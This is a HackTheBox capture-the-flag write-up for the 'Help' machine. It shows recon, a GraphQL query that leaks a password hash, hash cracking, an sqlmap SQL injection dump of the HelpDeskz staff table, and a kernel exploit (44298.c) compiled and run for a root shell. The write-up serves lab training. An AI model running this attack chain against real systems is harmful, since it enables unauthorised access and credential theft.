HackTheBox - Help

Updated 29-03-2026
#htb #hackthebox #writeup #ffuf #linux #sqlmap #john #hash-identifier

A Linux machine where a help desk application’s unauthenticated GraphQL endpoint exposes user credentials — and an authenticated SQL injection, combined with an older kernel vulnerability, escalates to root.

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ ip=10.129.3.123; ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -p$ports -sC -sV $ip 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-19 09:09 -0500
Nmap scan report for 10.129.3.123
Host is up (0.17s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.27 seconds

Findings:

  • 22/tcp: OpenSSH 7.2p2 (Ubuntu)
  • 80/tcp: Apache 2.4.18 redirecting to http://help.htb
  • 3000/tcp: Node.js Express server

Foothold

Hostname Setup

Add the vhost to /etc/hosts.

1
$ echo '10.129.3.123 help.htb' | sudo tee -a /etc/hosts

Visiting http://help.htb/ shows the default Apache2 page.

Directory Enumeration

Enumerate directories with ffuf.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ ffuf -c -u http://help.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://help.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/dirb/wordlists/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.hta                    [Status: 403, Size: 287, Words: 22, Lines: 12, Duration: 127ms]
.htaccess               [Status: 403, Size: 292, Words: 22, Lines: 12, Duration: 8108ms]
.htpasswd               [Status: 403, Size: 292, Words: 22, Lines: 12, Duration: 8110ms]
index.html              [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 124ms]
                        [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 133ms]
javascript              [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 148ms]
server-status           [Status: 403, Size: 296, Words: 22, Lines: 12, Duration: 147ms]
support                 [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 146ms]
:: Progress: [4614/4614] :: Job [1/1] :: 241 req/sec :: Duration: [0:00:19] :: Errors: 0 ::

ffuf discovers the /support directory, which is a HelpDeskz application. There is no obvious version information on the page, so we enumerate the /support directory further.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ ffuf -c -u http://help.htb/support/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://help.htb/support/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

LICENSE.txt             [Status: 200, Size: 18092, Words: 3133, Lines: 340, Duration: 247ms]
favicon.ico             [Status: 200, Size: 1150, Words: 5, Lines: 4, Duration: 162ms]
captcha.php             [Status: 200, Size: 2873, Words: 14, Lines: 12, Duration: 132ms]
readme.html             [Status: 200, Size: 7509, Words: 515, Lines: 154, Duration: 241ms]

We find readme.html, which shows the HelpDeskz version is Version: 1.0.2.

Searching for vulnerabilities, we find it is vulnerable to:

  • Authenticated SQL Injection
  • Arbitrary File Upload

GraphQL Recon

Visiting http://help.htb:3000/ returns the following API response:

1
message	"Hi Shiv, To get access please find the credentials with given query"

After some additional investigation, we discover it is using GraphQL at http://help.htb:3000/graphql, which responds with GET query missing.

Trying http://help.htb:3000/graphql?query=dsa returns a syntax error, that’s because GraphQL expects structured objects. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
$ curl -s -G http://help.htb:3000/graphql --data-urlencode "query={user}" | jq  
{
  "errors": [
    {
      "message": "Field \"user\" of type \"User\" must have a selection of subfields. Did you mean \"user { ... }\"?",                                                                                                                  
      "locations": [
        {
          "line": 1,
          "column": 2
        }
      ]
    }
  ]
}

$ curl -s -G http://help.htb:3000/graphql --data-urlencode "query={user {}}" | jq
{
  "errors": [
    {
      "message": "Syntax Error GraphQL request (1:8) Expected Name, found }\n\n1: {user {}}\n          ^\n",
      "locations": [
        {
          "line": 1,
          "column": 8
        }
      ]
    }
  ]
}

$ curl -s -G http://help.htb:3000/graphql --data-urlencode "query={user {username password}}" | jq
{
  "data": {
    "user": {
      "username": "helpme@helpme.com",
      "password": "5d3c93182bb20f07b994a7f617e99cff"
    }
  }
}

We are able to query and retrieve user credentials.

Hash Identification and Cracking

Identify the hash type using hash-identifier before attempting to crack it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ hash-identifier --help  
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

 Not Found.
--------------------------------------------------
 HASH: 5d3c93182bb20f07b994a7f617e99cff

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

The hash is identified as MD5. Crack it with john:

1
2
3
4
5
6
7
8
9
10
$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
godhelpmeplz     (?)     
1g 0:00:00:00 DONE (2026-02-19 10:56) 3.846g/s 30145Kp/s 30145Kc/s 30145KC/s godiamond11213..godessisis
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Now we have the credentials helpme@helpme.com:godhelpmeplz, and we can exploit CVE-2020-26546, the Authenticated SQL Injection.

SQL Injection via Ticket Attachment

Create a new ticket with an attachment. Then open the newly created ticket in the My Tickets tab.

Capture the attachment request in Burp and save it as req.txt:

1
2
3
4
5
6
7
8
9
10
11
$ cat req.txt 
GET /support/?v=view_tickets&action=ticket&param[]=7&param[]=attachment&param[]=2&param[]=9 HTTP/1.1
Host: help.htb
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://help.htb/support/?v=view_tickets&action=ticket&param[]=7
Accept-Encoding: gzip, deflate, br
Cookie: lang=english; PHPSESSID=0nl47eqa97kj42h0kms02o0ai5; usrhash=0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BEKbvyN8AcTUdaqjeJovHLY31HMiJ1SUhg7UALScKIZWw%3D%3D
Connection: keep-alive

Use sqlmap to enumerate database names with --dbs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ sqlmap -r req.txt --dbs 

<-SNIP->

[11:26:17] [INFO] fetching number of databases
[11:26:17] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:26:17] [INFO] retrieved: 5
[11:26:20] [INFO] retrieved: information_schema
[11:27:01] [INFO] retrieved: mysql
[11:27:14] [INFO] retrieved: performance_schema
[11:27:56] [INFO] retrieved: support
[11:28:13] [INFO] retrieved: sys
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] support
[*] sys

[11:28:21] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/help.htb'

[*] ending @ 11:28:21 /2026-02-19/

List tables in the support database:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ sqlmap -r req.txt -D support --tables

<-SNIP->

[19 tables]
+------------------------+
| articles               |
| attachments            |
| canned_response        |
| custom_fields          |
| departments            |
| emails                 |
| error_log              |
| file_types             |
| knowledgebase_category |
| login_attempt          |
| login_log              |
| news                   |
| pages                  |
| priority               |
| settings               |
| staff                  |
| tickets                |
| tickets_messages       |
| users                  |
+------------------------+

[11:36:36] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/help.htb'

[*] ending @ 11:36:36 /2026-02-19/

Dump the staff table and crack any discovered hashes using a dictionary-based attack with rockyou.txt:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
$ sqlmap -r req.txt -D support -T staff --dump              

<-SNIP->

[11:44:23] [INFO] retrieved: support@mysite.com
[11:44:52] [INFO] retrieved: Administrator
[11:45:14] [INFO] retrieved: 1
[11:45:15] [INFO] retrieved: 1543429746
[11:45:33] [INFO] retrieved: 1547216217
[11:45:50] [INFO] retrieved: 0
[11:45:53] [INFO] retrieved: d318f44739dced66793b1a603028133a76ae680e
[11:47:05] [INFO] retrieved: Best regards,  Administrator
[11:48:00] [INFO] retrieved: 

<-SNIP->

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N

do you want to crack them via a dictionary-based attack? [Y/n/q] Y

[11:54:19] [INFO] using hash method 'sha1_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> /usr/share/wordlists/rockyou.txt
[11:54:39] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] 

[11:54:42] [INFO] starting dictionary-based cracking (sha1_generic_passwd)
[11:54:42] [INFO] starting 4 processes 
[11:54:42] [INFO] cracked password 'Welcome1' for user 'admin'                                                     
Database: support                                                                                                  
Table: staff
[1 entry]
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+
| id | email              | login      | avatar | admin   | status   | fullname      | password                                            | timezone | username | signature                      | department         | last_login | newticket_notification |
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+
| 1  | support@mysite.com | 1547216217 | NULL   | 1       | Enable   | Administrator | d318f44739dced66793b1a603028133a76ae680e (Welcome1) | <blank>  | admin    | Best regards,\r\nAdministrator | a:1:{i:0;s:1:"1";} | 1543429746 | 0                      |
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+

[11:54:45] [INFO] table 'support.staff' dumped to CSV file '/home/kali/.local/share/sqlmap/output/help.htb/dump/support/staff.csv'                                                                                                      
[11:54:45] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/help.htb'

[*] ending @ 11:54:45 /2026-02-19/

We recover the credentials admin:Welcome1.

SSH Access

After testing likely usernames, we are able to log in using the username help:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ssh admin@help.htb                          
$ ssh support@help.htb
$ ssh staff@help.htb                                         
$ ssh shiv@help.htb
$ ssh help@help.htb      
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
help@help.htb's password: 
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-116-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
You have new mail.
Last login: Fri Jan 11 06:18:50 2019
help@help:~$

Privilege Escalation

Kernel Info

Check the kernel version:

1
2
help@help:~$ cat /proc/version
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

Exploit Research

Using searchsploit, we identify a possible local privilege escalation exploit:

1
2
3
4
5
6
7
$ searchsploit 4.4.0-116        
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                |  Path
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                                        | linux/local/44298.c
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Copy the exploit locally:

1
2
3
4
5
6
7
8
$ searchsploit -m linux/local/44298.c
  Exploit: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/44298
     Path: /usr/share/exploitdb/exploits/linux/local/44298.c
    Codes: CVE-2017-16995
 Verified: False
File Type: C source, ASCII text
Copied to: /home/kali/htb/help/44298.c

Exploit Execution

Copy the exploit to the target:

1
2
3
4
5
6
$ scp 44298.c help@help.htb:/tmp
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
help@help.htb's password: 
44298.c

Compile and execute it to obtain a root shell:

1
2
3
4
5
6
7
help@help:~$ cd /tmp
help@help:/tmp$ gcc 44298.c -o 44298
help@help:/tmp$ ./44298 
task_struct = ffff88003b8d8000
uidptr = ffff88003703ef04
spawning root shell
root@help:/tmp#